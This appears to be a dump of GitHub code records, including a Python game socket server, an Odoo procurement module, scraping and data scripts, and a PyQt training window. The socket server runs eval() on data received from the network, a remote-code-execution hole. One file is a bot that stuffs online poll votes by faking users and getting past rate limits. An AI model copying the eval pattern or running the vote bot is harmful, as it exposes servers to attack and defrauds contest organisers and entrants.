y_valid)","repo_name":"nnyy10/COMP90055_CNN_Emotion_Recognition","sub_path":"CNN/data_extraction/extract_cropped_img_data.py","file_name":"extract_cropped_img_data.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"41538271038","text":"import socket\nfrom _thread import *\n\nserver_ip = \"\"\n\nserver = server_ip\nport = 5555\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ntry:\n s.bind((server, port))\nexcept socket.error 
as e:\n print(str(e))\n\ns.listen(2)\nprint(\"Waiting for a connection, Server Started\")\n\nplayers = {}\n\ndef threaded_client(conn, player):\n global currentPlayer\n reply = \"\"\n while True:\n try:\n databit = conn.recv(2048)\n data = eval(databit.decode(\"utf-8\"))\n players[player] = data\n # iterate over a snapshot: popping from the dict while iterating it raises RuntimeError\n for p_index in list(players):\n if not players[p_index]:\n players.pop(p_index)\n reply = list(players.values())\n conn.send(str.encode(str(reply)))\n\n except:\n break\n\n print(\"Lost connection\")\n conn.close()\n\n\nglobal currentPlayer\ncurrentPlayer = 0\nwhile True:\n conn, addr = s.accept()\n print(\"Connected to:\", addr)\n start_new_thread(threaded_client, (conn, currentPlayer))\n currentPlayer += 1\n","repo_name":"fjaviergb/Pygames-Hermanios","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"74783120805","text":"n,k=map(int,input().split())\r\na=dict()\r\nans =0\r\ncount=0\r\nfor i in range (n):\r\n b=int(input())\r\n if b in a :\r\n a[b]+=1\r\n else:\r\n a[b]=1\r\nfor key in a:\r\n if a[key]%2==0:\r\n ans+=a[key]\r\n a[key]=0\r\n else:\r\n ans+=(a[key]-1)\r\n a[key]=1\r\nfor key in a:\r\n if a[key]==1:\r\n count+=1\r\nif count%2==0:\r\n ans+=count//2\r\nelse:\r\n ans+=(count//2)+1\r\nprint(ans)\r\n\r\n","repo_name":"gurnish-singh/cf-problems-solved-","sub_path":"drinks choosing.py","file_name":"drinks choosing.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3854477990","text":"import csv\nimport numpy as np\nimport pandas as pd \nimport math\n\nif __name__ == '__main__':\n\n data1 = pd.read_csv(\"label.csv\")\n df1 = pd.DataFrame(data=data1)\n data2 = pd.read_csv(\"label2.csv\")\n df3 = pd.DataFrame(data=data2)\n df1 = df1.append(df3,ignore_index=True)\n\n\n df1 = df1.interpolate(method ='linear', axis=0)\n df2 = df1\n df1 = df1[df1.PLAYER_ID == 1]\n df2 = df2[df2.PLAYER_ID == 2]\n\n df2 = df2.sort_values(by=['class'])\n df1 = df1.sort_values(by=['class'])\n df1.to_csv(\"output_player1_after_interpolate.csv\", index = False)\n df2.to_csv(\"output_player2_after_interpolate.csv\", index = False)\n\n'''\n data1 = pd.read_csv(\"output.csv\")\n df1 = pd.DataFrame(data=data1)\n #df1 = df1.interpolate(method ='linear', axis=0)\n\n data2 = pd.read_csv(\"output2.csv\")\n df2 = pd.DataFrame(data=data2)\n df2 = df2.drop(df2.index[0:107880])\n #df2 = df2[df2.frame > 52248]\n \n #print(df2)\n\n df3 = df1.append(df2)\n df3.to_csv(\"final.csv\", index = False)\n''' \n\n","repo_name":"Raychen0617/POSE_RECOGNITION_BADMINTION-I","sub_path":"training_data_create_by_ray/CHEN_Long_CHOU_Tien_Chen_Denmark_Open_2019_QuarterFinal/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74446070565","text":"#coding = utf-8\n# by 'hollowman6' from Lanzhou University(兰州大学)\n'''\n说明:\n支持多线程投票\n如果想要用此系统为你自己投票,请记下你的投票网址host,参数中aid和id的值,并用浏览器编译模式(F12)的network项获取其它参数,在‘目标投票网页参数设置’处修改;\n如果系统长时间无输出响应,请检查投票网页参数是否设置正确,网络连接是否正常;\n如果总显示“投票失败”,请首先检查获取openid部分代码正确与否;\n如果还有问题,请先用试着真实投票,并同时用Fiddler抓包,了解其原理后再对代码进行具体修改。\n\nDescription:\nSupport Multithreading voting\nIf you want to use this system to vote for yourself, please remember your voting URL host and the values of aid and id, and use the Network tab of the browser's developer tools (F12) to get other 
parameters, then modify them in the ‘Target voting page parameter setting’ section;\nIf the system has no output response for a long time, please check whether the voting page parameters are set correctly and the network connection is normal.\nIf \"Voting Failed\" is always displayed, first check whether the part of the code that obtains the openid is correct;\nIf you still have problems, try casting a real vote while capturing the traffic with Fiddler, and modify the code once you understand how it works.\n '''\n\n# 载入相关库 Load related libraries\nimport requests\nimport re\nimport time\nimport random\n# 多线程 Multithreading\n# import threading\n\n# 初始化计数变量 Initialize counter variables\ncount = 0\nind = False\n\n# 随机屏幕大小 Random Screen Size\nhlist = ['640', '800', '1024', '1400', '1600', '2048', '800', '1024', '1280',\n '1440', '1680', '1920', '2056', '960', '1280', '1366', '1920', '2560']\nwlist = ['480', '600', '768', '1050', '1200', '1536', '480', '600', '800',\n '900', '1050', '1200', '1600', '540', '720', '768', '1080', '1440']\n\n\ndef vote():\n global count, ind\n# 忽略过程中的网络错误 Ignore network errors during the process\n try:\n\n # 目标投票网页参数设置 Target voting page parameter setting\n host = \"http://www.citydating6.top\"\n aid = \"723\"\n id = \"41412\"\n url1 = host + \"/vote.php\"\n url2 = host + \"/api/createCode.php\"\n user = \"1\" + ''.join(random.sample('1234567890', 5))\n header1 = {\n \"User-Agent\":\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.691.400 QQBrowser/9.0.2524.400',\n \"Accept\":\n 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n \"Accept-Language\":\n 'zh-CN,zh;q=0.9'\n }\n cookies = {\"PHPSESSID\": 'n86ciil3u5n6a7257tmgced1d6', 'this_user': '1'}\n rtime = time.time()\n ptime = round(rtime)\n jtime = ''.join(random.sample('123456789', 3))\n post1 = {'time': ptime, 'j_time': jtime}\n\n # 获取随机生成用户的openid Get the openid of the randomly generated user\n html = requests.get(\n url=host + \"/activity_item1.php?aid=\" + aid + \"&id=\" + id +\n \"&userid=\" + user,\n headers=header1,\n cookies=cookies,\n verify=False)\n openid = ''.join(re.findall(r'var _xenon = \"(.+?)\";', html.text))\n\n # 获取验证码 get verification code\n header2 = {\n \"User-Agent\":\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.691.400 QQBrowser/9.0.2524.400',\n \"Referer\":\n host + \"/activity_item1.php?aid=\" + aid + \"&id=\" + id + \"&userid=\"\n + user + \"&orther_openid=\" + openid,\n \"Accept\":\n 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n \"Accept-Language\":\n 'zh-CN,zh;q=0.9'\n }\n code = requests.post(\n url=url2,\n data=post1,\n headers=header2,\n cookies=cookies,\n verify=False).text[-9:-2].replace(\",\", '')\n\n # 投票 Voting\n n = random.randint(0, 17)\n post2 = {\n 'aid': aid,\n \"width\": wlist[n],\n \"height\": hlist[n],\n 'id': id,\n 'wechatid': user,\n 'orther_id': openid,\n 'xenon': openid,\n 'code': code,\n 'p_time': ptime,\n 'j_time': jtime\n }\n vote = requests.post(\n url=url1,\n data=post2,\n headers=header2,\n cookies=cookies,\n verify=False).text[25]\n\n # 判断投票状态 Judging voting status\n if vote == '2':\n print(\"投票失败,可能程序此时使用的账号已经投过票。还将继续为您投票,请稍侯···\")\n # Translation: The vote failed; 
the account used by the program at this time may have voted. The program will continue to vote for you, please wait...\n elif vote == '0':\n count += 1\n print(\"恭喜您,投票成功,此程序已经为您投票{:}次!\".format(count))\n # Translation: Congratulations! the vote is successful, this program has already voted for you {:} times!\n elif vote == '3':\n print(\"投票速度过快,已被系统禁止投票,请稍后再试!\")\n # Translation: The voting speed is too fast and has been banned from voting by the system. Please try again later!\n ind = True\n elif vote == '4':\n print(\"验证码错误!请检查获取验证码部分代码!\")\n # Translation: Verification code error! Please check the code of getting the verification code!\n ind = True\n else:\n print(\"抱歉,现在不能投票!\")\n # Translation: Sorry, can't vote now!\n ind = True\n '''\n threadmax.release()\n '''\n\n # 设置每次投票间隔时间(可选) Set the interval between each vote (optional)\n time.sleep(random.normalvariate(13.5, 3))\n\n except Exception:\n print(\"程序出错!\")\n '''\n threadmax.release()\n '''\n\n\n'''\n# 使用多线程(可选) Using multithreading(optional)\n\n# 限制线程的最大数量为32个 The maximum number of restricted threads is 32\nthreadmax = threading.BoundedSemaphore(128)\n\nl = []\nwhile True:\n if ind==True:\n break\n # 增加信号量,可用信号量减一 Increase the semaphore and subtract one from the semaphore\n threadmax.acquire()\n t = threading.Thread(target=vote)\n t.start()\n l.append(t)\n for t in l:\n t.join()\n'''\nwhile True:\n if ind == True:\n break\n vote()\n# 要使用多线程投票,请将121-147行的'''删去,并将此注释上一行的vote()也删去\n# To use multithreaded voting, delete'''in lines 122-148 and vote () in the previous line of this comment\n","repo_name":"HollowMan6/AutoVoting-for-Yunmai","sub_path":"AutoVoting-for-Yunmai.py","file_name":"AutoVoting-for-Yunmai.py","file_ext":"py","file_size_in_byte":7212,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"38806923135","text":"import pickle\nimport os.path\n\n# ask the user to select an item\n# the user can:\n# - \"add\" an item to the list\n# - \"show\" the list of items\n# - \"count\" to print the items count\n# - \"remove\" the last item from the list\n# - \"clear\" the list\n\n# - * for the \"show\" command, the output should print the description, and the price also\n# - * \"total\" to show the total to be paid\n# - * \"add_to_stock\" ask the user for the name, description and price\n# - * \"stock\" to list all available in stocks\n# - * validate before \"remove\" item\n# - * validate before \"clear\"\n# - * on \"show\" show a message if the basket is empty\n# - * save the stock in file on exit\n# - * save the basket in file on exit\n# - * restore the stock from file on start\n# - * restore the basket from file on start\n\n\nstock = {\n 'cola': 5000,\n 'pepsi': 10000,\n 'sugar': 6000,\n}\n\nstock_description = {\n 'cola': 'Coca Cola',\n 'pepsi': 'Pepsi 200ml',\n 'sugar': '500g'\n}\n\nbasket = []\n\nis_running = True\n\nif os.path.exists(\"basket.data\"):\n print(\"loading the basket from basket.data\")\n with open(\"basket.data\", \"rb\") as basket_file:\n basket = pickle.load(basket_file)\n\nif os.path.exists(\"stock.data\"):\n print(\"loading the stock from stock.data\")\n with open(\"stock.data\", \"rb\") as stock_file:\n stock = pickle.load(stock_file)\n\nif os.path.exists(\"stock_description.data\"):\n print(\"loading the stock from stock_description.data\")\n with open(\"stock_description.data\", \"rb\") as stock_description_file:\n stock_description = pickle.load(stock_description_file)\n\n\nwhile is_running:\n\n command = input(\"Select a command (add, show, 
show_item, count, remove, clear, total, add_to_stock, stock, exit): \")\n\n if command == \"add\":\n item = input(\"Please enter the item name: \")\n\n if item in stock:\n basket.append(item)\n else:\n print(item, \"does not exist in the stock!\")\n print(\"Available items:\")\n for key, price in stock.items():\n print(f\"{key}: {price}\")\n\n elif command == \"show\":\n if len(basket) == 0:\n print(\"No items in your basket.\")\n else:\n for i, item in enumerate(basket):\n print(f\"{i}: {item}\", stock[item], stock_description[item])\n\n elif command == \"show_item\":\n index = int(input(\"Please enter the item index: \"))\n print(basket[index])\n\n elif command == \"count\":\n print(\"You have\", len(basket), \"items.\")\n\n elif command == \"remove\":\n if len(basket) > 0:\n remove_item = basket.pop()\n print(\"Removing last item:\", remove_item)\n else:\n print(\"Basket already empty\")\n\n elif command == \"clear\":\n if len(basket) > 0:\n basket.clear()\n print(\"Basket is empty now\")\n else:\n print(\"Basket already empty\")\n\n elif command == \"total\":\n total = 0\n for item in basket:\n price = stock[item]\n total = price + total\n\n print(\"The total is:\", total)\n\n elif command == \"add_to_stock\":\n name = input(\"Enter the name: \")\n description = input(\"Enter the description: \")\n price = float(input(\"Enter the price: \"))\n\n stock[name] = price\n stock_description[name] = description\n\n print(\"Item\", name, \"is added to the stock\")\n\n elif command == \"stock\":\n print(\"Available items:\")\n for key, price in stock.items():\n print(f\"{key}: {price}\", stock_description[key])\n\n elif command == \"exit\":\n\n print(\"saving the basket into basket.data\")\n with open(\"basket.data\", \"wb\") as basket_file:\n pickle.dump(basket, basket_file)\n\n print(\"saving the stock into stock.data\")\n with open(\"stock.data\", \"wb\") as stock_file:\n pickle.dump(stock, stock_file)\n\n print(\"saving the stock into stock_description.data\")\n with open(\"stock_description.data\", \"wb\") as stock_description_file:\n pickle.dump(stock_description, stock_description_file)\n\n print(\"Bye bye!\")\n is_running = False\n\n else:\n print(\"Unknown command\", command)\n","repo_name":"ahmad-moussawi/python-exercices","sub_path":"list_basket.py","file_name":"list_basket.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27602438386","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# adapted from: https://bigishdata.com/2016/09/27/getting-song-lyrics-from-geniuss-api-scraping/\n# to find the artist ID, go to https://docs.genius.com/#/authentication-h1\n# and search for a song by that artist, then find the \"id\" tag in the results\nimport sys\nimport requests\nimport json\nfrom bs4 import BeautifulSoup\nsys.path.append('C:\\PythonProjects\\PythonUtilities')\nimport CFGFileHelper\n\ncfgpath = 'C:\\PythonProjects\\Private\\lyricgeniuscredentials.ini'\ncredentialdict = CFGFileHelper.read(cfgpath,'credentials')\n\nbase_url = \"http://api.genius.com\"\ntoken = 'Bearer '+ credentialdict['client_access_token']\nheaders = {'Authorization': token}\n\n# the national\nartist_id = '658'\nfilename = \"thenational2.txt\"\n\n#tom petty\nartist_id = '67932'\nfilename = \"tompetty.txt\"\n\ndef lyrics_from_song_api_path(song_api_path):\n song_url = base_url + song_api_path\n response = requests.get(song_url, headers=headers)\n json = response.json()\n path = 
json[\"response\"][\"song\"][\"path\"]\n #gotta go regular html scraping... come on Genius\n page_url = \"https://genius.com\" + path\n page = requests.get(page_url)\n html = BeautifulSoup(page.text, \"html.parser\")\n #remove script tags that they put in the middle of the lyrics\n [h.extract() for h in html('script')]\n #at least Genius is nice and has a tag called 'lyrics'!\n lyrics = html.find(\"div\", class_=\"lyrics\").get_text() #updated css where the lyrics are based in HTML\n lyrics = lyrics.replace('\\n', ' ')\n return lyrics\n\n\n\ndef pull_lyrics():\n with open(filename, \"w\", encoding=\"utf-8\") as outfile:\n nextpage = 1\n while nextpage != None:\n print(\"Downloading page \"+str(nextpage))\n url = base_url + \"/artists/\"+artist_id+ \"/songs?per_page=50&page=\"+str(nextpage)\n response = requests.get(url, headers=headers)\n json = response.json()\n nextpage = json[\"response\"][\"next_page\"]\n for song in json[\"response\"][\"songs\"]:\n print(song[\"title\"]+\" by \"+song[\"primary_artist\"][\"name\"])\n song_api_path = song[\"api_path\"]\n lyrics = lyrics_from_song_api_path(song_api_path)\n outfile.write(lyrics)\n # the with-block closes the file automatically\n\nif __name__ == \"__main__\":\n pull_lyrics()\n\n\n","repo_name":"Furricane/LyricWebScraper","sub_path":"LyricWebScraper.py","file_name":"LyricWebScraper.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21740279916","text":"from datetime import datetime\nfrom dateutil.relativedelta import relativedelta\n\nfrom openerp import SUPERUSER_ID\nfrom openerp.osv import fields, osv\nfrom openerp.tools import DEFAULT_SERVER_DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT, DATETIME_FORMATS_MAP\nfrom openerp.tools.translate import _\n\nimport re\n\nclass procurement_order(osv.osv):\n \n def create_procurement_purchase_order(self, cr, uid, procurement, po_vals, line_vals, context=None):\n sale_line = procurement.sale_line_id\n if sale_line:\n po_vals[\"sale_order_id\"]=sale_line.order_id.id \n return super(procurement_order,self).create_procurement_purchase_order(cr, uid, procurement, po_vals, line_vals, context=context)\n \n def _get_po_line_values_from_proc(self, cr, uid, procurement, partner, company, schedule_date, context=None):\n res = super(procurement_order, self)._get_po_line_values_from_proc(cr, uid, procurement, partner, company, schedule_date, context=context)\n sale_line = procurement.sale_line_id\n if sale_line:\n # set sale line \n res[\"sale_line_id\"] = sale_line.id\n \n # TODO: this is not a good solution for all cases\n # res[\"name\"] = sale_line.name\n \n # procurement info note NOT added\n # because, for example, sale_purchase_quotation adds procurement\n # info directly to the purchase order\n # if needed, an extra module sale_purchase_note should be added\n \n # add analytic account\n analytic_account = sale_line.order_id.project_id\n if analytic_account: \n res[\"account_analytic_id\"]=analytic_account.id\n \n return res\n \n def make_po(self, cr, uid, ids, context=None):\n \"\"\" Resolve the purchase from procurement, which may result in a new PO creation, a new PO line creation or a quantity change on existing PO line.\n Note that some operations (as the PO creation) are made as SUPERUSER because the current user may not have rights to do it (mto product launched by a sale for example)\n\n @return: dictionary giving for each procurement its related resolving PO line.\n \"\"\"\n res = {}\n company = self.pool.get('res.users').browse(cr, uid, uid, 
context=context).company_id\n po_obj = self.pool.get('purchase.order')\n po_line_obj = self.pool.get('purchase.order.line')\n seq_obj = self.pool.get('ir.sequence')\n pass_ids = []\n linked_po_ids = []\n sum_po_line_ids = []\n for procurement in self.browse(cr, uid, ids, context=context):\n ctx_company = dict(context or {}, force_company=procurement.company_id.id)\n partner = self._get_product_supplier(cr, uid, procurement, context=ctx_company)\n if not partner:\n self.message_post(cr, uid, [procurement.id], _('There is no supplier associated to product %s') % (procurement.product_id.name))\n res[procurement.id] = False\n else:\n schedule_date = self._get_purchase_schedule_date(cr, uid, procurement, company, context=context)\n purchase_date = self._get_purchase_order_date(cr, uid, procurement, company, schedule_date, context=context) \n line_vals = self._get_po_line_values_from_proc(cr, uid, procurement, partner, company, schedule_date, context=ctx_company)\n #look for any other draft PO for the same supplier, to attach the new line on instead of creating a new draft one\n available_draft_po_ids = po_obj.search(cr, uid, [\n ('partner_id', '=', partner.id), ('state', '=', 'draft'), ('picking_type_id', '=', procurement.rule_id.picking_type_id.id),\n ('location_id', '=', procurement.location_id.id), ('company_id', '=', procurement.company_id.id), ('dest_address_id', '=', procurement.partner_dest_id.id)], context=context)\n if available_draft_po_ids: \n \n po_id = available_draft_po_ids[0]\n po_rec = po_obj.browse(cr, uid, po_id, context=context)\n\n # crate new origin\n po_origins = set(self._re_split_po_origin.split(po_rec.origin or \"\")) \n po_origins |= set(self._re_split_po_origin.split(procurement.origin or \"\"))\n po_origins = list(po_origins)\n po_origins.sort() \n po_to_update = {'origin': ', '.join(po_origins)}\n \n #if the product has to be ordered earlier those in the existing PO, we replace the purchase date on the order to avoid ordering it too late\n if datetime.strptime(po_rec.date_order, DEFAULT_SERVER_DATETIME_FORMAT) > purchase_date:\n po_to_update.update({'date_order': purchase_date.strftime(DEFAULT_SERVER_DATETIME_FORMAT)})\n po_obj.write(cr, uid, [po_id], po_to_update, context=context)\n #look for any other PO line in the selected PO with same product and UoM to sum quantities instead of creating a new po line\n available_po_line_ids = po_line_obj.search(cr, uid, [('order_id', '=', po_id), ('product_id', '=', line_vals['product_id']), ('product_uom', '=', line_vals['product_uom']), ('sale_line_id', '=', line_vals.get('sale_line_id',False))], context=context)\n if available_po_line_ids:\n po_line = po_line_obj.browse(cr, uid, available_po_line_ids[0], context=context)\n po_line_id = po_line.id\n new_qty, new_price = self._calc_new_qty_price(cr, uid, procurement, po_line=po_line, context=context)\n\n if new_qty > po_line.product_qty:\n po_line_obj.write(cr, SUPERUSER_ID, po_line.id, {'product_qty': new_qty, 'price_unit': new_price}, context=context)\n self.update_origin_po(cr, uid, po_rec, procurement, context=context)\n sum_po_line_ids.append(procurement.id)\n else:\n line_vals.update(order_id=po_id)\n po_line_id = po_line_obj.create(cr, SUPERUSER_ID, line_vals, context=context)\n linked_po_ids.append(procurement.id)\n else:\n name = seq_obj.get(cr, uid, 'purchase.order', context=context) or _('PO: %s') % procurement.name\n po_vals = {\n 'name': name,\n 'origin': procurement.origin,\n 'partner_id': partner.id,\n 'location_id': procurement.location_id.id,\n 
'picking_type_id': procurement.rule_id.picking_type_id.id,\n 'pricelist_id': partner.property_product_pricelist_purchase.id,\n 'currency_id': partner.property_product_pricelist_purchase and partner.property_product_pricelist_purchase.currency_id.id or procurement.company_id.currency_id.id,\n 'date_order': purchase_date.strftime(DEFAULT_SERVER_DATETIME_FORMAT),\n 'company_id': procurement.company_id.id,\n 'fiscal_position': po_obj.onchange_partner_id(cr, uid, None, partner.id, context=dict(context, company_id=procurement.company_id.id))['value']['fiscal_position'],\n 'payment_term_id': partner.property_supplier_payment_term.id or False,\n 'dest_address_id': procurement.partner_dest_id.id,\n }\n po_id = self.create_procurement_purchase_order(cr, SUPERUSER_ID, procurement, po_vals, line_vals, context=dict(context, company_id=po_vals['company_id']))\n po_line_id = po_obj.browse(cr, uid, po_id, context=context).order_line[0].id\n pass_ids.append(procurement.id)\n res[procurement.id] = po_line_id\n self.write(cr, uid, [procurement.id], {'purchase_line_id': po_line_id}, context=context)\n if pass_ids:\n self.message_post(cr, uid, pass_ids, body=_(\"Draft Purchase Order created\"), context=context)\n if linked_po_ids:\n self.message_post(cr, uid, linked_po_ids, body=_(\"Purchase line created and linked to an existing Purchase Order\"), context=context)\n if sum_po_line_ids:\n self.message_post(cr, uid, sum_po_line_ids, body=_(\"Quantity added in existing Purchase Order Line\"), context=context)\n return res\n \n _inherit = \"procurement.order\"\n _re_split_po_origin = re.compile(\"[,]\\s*\")\n","repo_name":"funkring/fdoo","sub_path":"addons-funkring/at_purchase_sale/procurement.py","file_name":"procurement.py","file_ext":"py","file_size_in_byte":8794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"462455418","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 25 16,32,12 2018\n\n@author, Ragini\n\"\"\"\n\n# Week 1, Class 1 Qns to do\n\n#Qn 1, Fizzbuzz Qns\n\ndef fizzbuzz():\n new_list = []\n for i in range(1,101):\n if i%3 == 0 and i%5 == 0:\n new_list.append(\"Fizzbuzz\")\n elif i%3 == 0:\n new_list.append(\"Fizz\")\n elif i%5 == 0:\n new_list.append(\"Buzz\")\n else:\n new_list.append(i)\n return new_list\nfizzbuzz()\n\n#Qn 2, Integer to Roman Numerals\n\n#Create a reference table for the roman numerals against the integers \nroman_numeral_table = [(\"M\", 1000), (\"CM\", 900), (\"D\", 500), (\"CD\", 400), (\"C\", 100), (\"XC\", 90), \n (\"L\", 50), (\"XL\", 40), (\"X\", 10), (\"IX\", 9), (\"V\", 5), (\"IV\", 4), (\"I\", 1)]\n\ndef int_to_roman(inp_num):\n final_num = \"\"\n \n #check if inp_num is not positive\n if inp_num <=0:\n raise ValueError(\"Your number must be positive\")\n # (\"Your number is invalid\")\n \n for letter,value in roman_numeral_table:\n while value <= inp_num:\n inp_num -= value\n final_num += letter\n #print(final_num)\n return final_num\nint_to_roman(37120)\n \n#Qn 3, Caesar Cipher\ndef get_value_for_char(inp_msg):\n \n final_str = \"\"\n mesg = inp_msg.replace(\" \", \"\")\n for char in mesg:\n \n char_num = ord(char)\n char_num += 13\n \n if char_num >= 123:\n residue = -(123 - char_num)\n char_num = 97 + residue \n \n #final_list.append(chr(char_num))\n final_str += chr(char_num)\n return final_str\n \nget_value_for_char(\"hello world\")\n ","repo_name":"Ragmthy/ixperience_2018_personal","sub_path":"Week 1 
Items/Day1_Hwk.py","file_name":"Day1_Hwk.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19223430016","text":"from pelican.utils import pelican_open\nimport yaml\n\ndef read_with_meta(self, filename):\n with pelican_open(filename) as fp:\n text = list(fp.splitlines())\n\n metadata = {}\n content = ''\n if text[0].rstrip() == '---':\n i = 1\n while len(text) > i:\n if text[i].rstrip() in ('---', '...'):\n break\n i += 1\n metadata_yaml, content = '\\n'.join(text[1:i]), '\\n'.join(text[i+1:])\n for name, value in yaml.safe_load(metadata_yaml).items():\n metadata[name] = self.process_metadata(name, value)\n else:\n for i, line in enumerate(text):\n kv = line.split(':', 1)\n if len(kv) == 2:\n name, value = kv[0].lower(), kv[1].strip()\n # strip the surrounding quotes from both ends\n if value.startswith('\"') and value.endswith('\"'):\n value = value[1:-1]\n elif value.startswith(\"'\") and value.endswith(\"'\"):\n value = value[1:-1]\n metadata[name] = self.process_metadata(name, value)\n else:\n content = \"\\n\".join(text[i:])\n break\n\n return metadata, content\n\n\n","repo_name":"skydark/skydark.blog","sub_path":"plugins/skydark_helper.py","file_name":"skydark_helper.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"697058391","text":"from PyQt5 import Qt\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.figure import Figure\n\nimport config\nfrom dataset import DataFile\nfrom cnn import CNN\n\n\nclass TrainForm(QMainWindow):\n\n def __init__(self, model: CNN):\n super().__init__()\n self.model = model\n # Set title\n self.setWindowTitle(\"训练模型\")\n self.setWindowModality(Qt.ApplicationModal)\n # Setup panel\n tool_panel = QToolBar()\n self.addToolBar(Qt.LeftToolBarArea, tool_panel)\n tool_panel.setMovable(False)\n # Training options\n tool_panel.addWidget(QLabel(\"训练批量\"))\n self.spin_batch_size = QSpinBox()\n self.spin_batch_size.setMinimum(100)\n self.spin_batch_size.setMaximum(1000)\n self.spin_batch_size.setSingleStep(1)\n self.spin_batch_size.setValue(100)\n tool_panel.addWidget(self.spin_batch_size)\n tool_panel.addWidget(QLabel(\"训练次数\"))\n self.spin_iter = QSpinBox()\n self.spin_iter.setMinimum(100)\n self.spin_iter.setMaximum(100000)\n self.spin_iter.setSingleStep(1)\n self.spin_iter.setValue(100)\n tool_panel.addWidget(self.spin_iter)\n tool_panel.addWidget(QLabel(\"报告间隔\"))\n self.spin_print_iter = QSpinBox()\n self.spin_print_iter.setMinimum(10)\n self.spin_print_iter.setMaximum(1000)\n self.spin_print_iter.setSingleStep(100)\n self.spin_print_iter.setValue(10)\n tool_panel.addWidget(self.spin_print_iter)\n self.check_incremental = QCheckBox(\"增量训练\")\n self.check_incremental.setChecked(True)\n tool_panel.addWidget(self.check_incremental)\n self.btn_start_train = QPushButton(\"开始训练\")\n self.btn_start_train.clicked.connect(self.train_model)\n tool_panel.addWidget(self.btn_start_train)\n self.btn_save_model = QPushButton(\"保存模型\")\n self.btn_save_model.clicked.connect(self.save_model)\n self.btn_save_model.setDisabled(True)\n tool_panel.addWidget(self.btn_save_model)\n tool_panel.addSeparator()\n # Visualization options\n tool_panel.addWidget(QLabel(\"可视化选项\"))\n self.check_plot_loss = QCheckBox(\"可视化损失函数值\")\n self.check_plot_loss.setChecked(True)\n 
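# note: read checkbox state with isChecked(); a QCheckBox object itself is always truthy\n 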
tool_panel.addWidget(self.check_plot_loss)\n self.check_plot_acc = QCheckBox(\"可视化准确率\")\n self.check_plot_acc.setChecked(True)\n tool_panel.addWidget(self.check_plot_acc)\n self.btn_save_image = QPushButton(\"保存图片\")\n self.btn_save_image.clicked.connect(self.save_image)\n tool_panel.addWidget(self.btn_save_image)\n # Setup log board\n self.label_log = QLabel(\"\")\n tool_panel.addSeparator()\n tool_panel.addWidget(self.label_log)\n # Setup progress bar\n tool_progress = QToolBar()\n self.addToolBar(Qt.BottomToolBarArea, tool_progress)\n self.progress_bar = QProgressBar()\n tool_progress.addWidget(self.progress_bar)\n tool_progress.setMovable(False)\n # Setup canvas\n self.figure = Figure()\n self.canvas = FigureCanvas(self.figure)\n self.setCentralWidget(self.canvas)\n # Center windows (integer division: PyQt5 rejects floats for pixel coordinates)\n screen_size = QDesktopWidget().screenGeometry()\n frame_size = self.frameSize()\n self.move((screen_size.width() // 2) - (frame_size.width() // 2),\n (screen_size.height() // 2) - (frame_size.height() // 2))\n\n def setLog(self, text):\n self.label_log.setText(text)\n\n def train_model(self):\n # Load data\n self.setLog(\"正在加载数据...\")\n data_file = DataFile(config.data_file)\n if len(data_file) == 0:\n self.setLog(\"无训练数据\")\n return\n train_obs, train_act, test_obs, test_act = data_file.gen_train_set()\n # Clear history\n self.loss_hist = []\n self.acc_hist = []\n # Initialize network\n if not self.check_incremental.isChecked():\n self.setLog(\"初始化模型\")\n self.model.initialize()\n # Start train\n self.setLog(\"正在训练模型...\")\n self.model.fit(train_obs, train_act, test_obs, test_act,\n batch_size=self.spin_batch_size.value(),\n iters=self.spin_iter.value(),\n print_iters=self.spin_print_iter.value(),\n report_func=self.report_progress)\n self.setLog(\"训练完成\")\n self.btn_save_model.setDisabled(False)\n\n def report_progress(self, iter, hist):\n self.progress_bar.setValue(int((iter+1) / self.spin_iter.value() * 100))\n if self.check_plot_loss.checkState() and self.check_plot_acc.checkState():\n # Plot loss\n loss = hist['loss']\n loss_plot = self.figure.add_subplot(211)\n loss_plot.clear()\n loss_plot.plot(loss, '*-')\n # Plot acc\n train_acc = hist['train_acc']\n val_acc = hist['val_acc']\n acc_plot = self.figure.add_subplot(212)\n acc_plot.clear()\n acc_plot.plot(train_acc, '*-')\n 